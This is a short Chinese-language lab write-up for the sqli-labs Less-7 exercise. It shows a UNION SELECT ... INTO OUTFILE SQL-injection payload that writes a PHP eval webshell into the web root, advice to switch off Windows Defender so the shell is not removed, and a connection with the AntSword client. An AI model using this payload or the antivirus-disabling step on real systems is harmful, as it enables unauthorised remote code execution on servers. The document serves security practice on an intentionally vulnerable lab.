sqli-labs less-7 一句话木马

(纯小白,有建议欢迎提出)

 

一.判断注入点

很容易得出 ?id=1'))--+

二.写马

用到文件写入操作,需要开启mysql中的文件写入:

打开这个文件

\phpstudy_pro\Extensions\MySQL5.7.26\my.ini

加上这句代码(修改完成后记得重启mysql才能生效 )

 secure_file_priv 用来限制导出效果,有三个属性：
null限制不能导出
为空可以自定义
为一个路径则只能导出到指定路径

先使用order by 判断出字段数为3

然后构造payload:

?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+

?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+

注意:要先在Windows 安全中心把实时保护给关了,要不然你传一个他给你删一个........

(手动关的话下次开机就会给你打开,很恶心,如果想永久关闭,可以试试这个一键关闭微软杀毒软件_Windows_Defender)

中国蚁剑直接连,成功